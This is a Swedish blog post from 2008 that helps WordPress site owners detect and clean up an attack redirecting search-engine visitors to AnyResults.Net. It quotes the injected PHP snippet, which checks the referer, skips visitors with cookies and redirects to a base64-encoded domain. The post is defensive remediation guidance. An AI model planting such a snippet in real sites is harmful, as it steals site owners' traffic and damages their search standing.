Lösningar på AnyResults.Net WordPress Redirect på trafik från Google

6/09/2008

Det här angreppet ser ut att vara riktigt vanligt. Dagarna sedan jag såg det första gången har jag för svenska bloggar om internet fått det på två till tre per dag. Jag bloggade lite om det första dagen när jag såg det men har här sammanfattat det jag såg själv eller som andra dokumenterat. Du hittar också länkar och information om att lösa problemet.

Vad innebär angreppet?
Åtminstone vissa av de besökare som klickar på en länk till en angripen sajt i ett sökresultat hos en sökmotor (t.ex. Google.com, Google.se och Live.com) kommer skickas vidare från den angripna sajten till en annan domän. I många fall nu har de skickats till AnyResults.Net.

Här har jag sökt på "pusha sig själv" på Google.se:

När jag klickar på Google:s länk till http://www.webmastern.se/?p=449 i sökresultatet på Google.se kom jag istället till AnyResults.Net:

Det är sajten www.webmastern.se som med redirect skickar vidare besökaren.

Vilka skada gör angreppet
Den drabbade sajten kan potentiellt lida stor skada:

  • Trafiken från sökmotorer kan gå ner. Sajten får delar av denna trafik stulen.
  • Informationen angriparen får kan innehålla information om bra sökord som den drabbade helst vill hålla för sig själv.
  • Google kan ta bort sajten ur sökresultaten. Detta uppger flera angripna ha drabbats av.

Vilken "nytta" gör trafiken? Vad får angriparen ut på det?
Diskuterar man det här generellt för hela gruppen av sådana här angrepp snarare än just detta kan man se flera värden för angriparen:

  • En angripare (som inte behöver vara samma person som introducerade problemet hos den drabbade) kan utnyttja detta för att skada drabbade så att de försvinner från sökresultaten.
  • En angripare kan omvandla stulen trafik till intäkter snabbt.
  • Beroende på hur många är drabbade kan den statistik som samlas om sökord bli mycket värdefull.

Exempel på hur trafiken kan omvandlas snabbt till intäkter inkluderar:

  • Sälja en vara.
  • Genomföra ett annat angrepp t.ex. genom att samla in kreditkortsnummer.
  • Sälja trafiken vidare till de typer av aktörer som köper relevant trafik oavsett "övriga omständigheter". Där har vi bl.a. oseriösa internetapotek.

Trafiken kan också skickas till troligen seriöst affiliate-program (läs mer i Wikipedia: Affiliate marketing) eller automatisk annonsering där de får betalt per klick, som missbrukas. Både kunden som köper trafik från affiliate och affilitate-aktören kan vara offer.

Statistik om sökord
Om det här angreppet varit stort har en enorm mängd statistik som kan användas för att uppskatta vilken trafik olika sökord har nu samlats in. Sådant kan vara mycket värdefullt. I det här angreppet hamnade ju åtminstone en del (troligen väldigt mycket) av trafiken slutligen hos Thefreedictionary.com:

Där ser vi att trafiken skickas till det ursprungliga nyckelordet man sökte på. I exemplet ovan: encyclopedia.thefreedictionary.com/seoblogg. För en uppslagsbok som Thefreedictionary.com bör detta vara värdefullt.

Vad är det för säkerhetshål som orsakar detta?
Efter vad som blivit känt de senaste dagarna är det inte specifikt generellt säkerhetshål i Wordpress. Istället är det ett angrepp som genomförts där ett stycke kod lagts till. Det är denna kod som orsakar problemet.

Drabbade installationer inkluderar även senaste Wordpress (2.5.1) som åtminstone inte har något dokumenterat säkerhetshål som troligt kan ha utnyttjats. I detta fall kan man tänka sig följande förklaringar:

1. Ett säkerhetshål på annat håll i servern har givit problemet. D.v.s. angriparen söker först rätt på respektive Wordpress-installation och testar sedan efter ett urval av säkerhetshål där kanske även mjukvara med säkerhetshål som ofta finns tillsammans med Wordpress.com även testat.

2. En Wordpress-laddades ner som uppgas vara WordPress (2.5.1) men i verkligen hade fått säkerhetshål insatta. Sådant förekommer relativt ofta på internet och stor försiktighet är viktigt för att verifiera att man verkligen laddar ner från leverantören och inte en angripare.

3. Den fientliga koden kan ha introducerats innan uppdatering till WordPress (2.5.1) skedde.

Hur testar man om en sajt angripits?
Detta är inte helt lätt. Du kan pröva söka på sökmotorer och klicka på din sajt. Skickas du till fel sajt är du drabbad. Sökmotorer att testa med:

Om du inte skickas till fel sajt kan du ändå vara drabbad. Redirect verkar nämligen inte ske hela tiden. En eller flera av följande faktorer kan bl.a. tänkas spela in:

  • Endast trafik vid vissa tidpunkter skickas vidare. Det kan vara trafik under natten för aktuell region.
  • Samma besökare skickas inte vidare mer än X gånger. Jag tror det här kan vara fallet och att det är för att folk ska tro att det löst sig själv.

Följande kod har dokumenterats hos flera drabbade och har lagts till i wp-blog-header.php (header.php, index.php mm kan vara aktuellt också):

?php \ $seref=array(”google”,”msn”,”live”,”altavista”,”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1″; break; }
if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?>

Koden behöver inte alls vara allt som stoppats in. Tvärtom finns det fler ändringar dokumenterade. Även andra varianter av koden (kanske från olika angripare) förekommer. Ta dig med andra en titt på koden ovan och titta sedan igenom dina filer efter något liknande. Förslagsvis laddar du ner originalfilen från Wordpress.org för att ha att jämföra med.

Övrigt att titta efter:

  • Du tappar trafik från sökmotorer.
  • Du tappar intäkter.

Av vad jag sett är det bara sajter som kör Wordpress Wordpress som drabbats. Så vitt jag vet förekommer det har emellertid inte på Wordpress.org.

Att fixa problemet
Först löser du det omedelbara problemet d.v.s. att din trafik skickas vidare med redirect. Sedan behöver du se till att din Wordpress-installation är säker och löper låg risk för att drabbas av nya angrepp. Följande diskuterar hur det omedelbara problemet kan lösas:

Konsultera också Wordpress.org:

För att minska risken för att drabbas igen bör du härda din Wordpress-installation. Läs mer på Wordpress.org: Hardening WordPress.

Tidigare bloggat
Följande bloggpostningar har jag gjort tidigare om detta säkerhetsproblem:

1 kommentar
Anonym sa...

Bra artikel. Bara till att börja beta av dina förslag.

2008-06-09 18:30

Kommentera